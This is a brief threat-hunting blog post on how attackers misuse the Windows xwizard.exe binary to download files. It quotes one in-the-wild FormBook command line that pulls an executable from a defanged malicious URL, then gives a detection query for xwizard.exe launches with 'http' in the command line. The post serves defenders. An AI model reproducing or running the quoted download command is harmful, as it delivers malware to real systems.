238. LOLBAS ITW: Extensible Wizards Host Process
Hello everyone!
There're lots of LOLBAS, but are all of them used in-the-wild? Let's look how real adversaries abuse Extensible Wizards Host Process for Ingress Tool Transfer (T1105).
So, Extensible Wizards Host Process can be used by adversaries to download a malicious file from a remote server. Here's an example related to FormBook:
XwIZarD.exe RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z hXXps://gbuarts[.]com/cc/Protected.exe
For example, we can look for xwizard.exe executions with "http" among command line parameters:
event_type: "processcreatewin"
AND
proc_file_path: "XwIZarD.exe"
AND
cmdline: *http*
See you tomorrow!
Comments
Post a Comment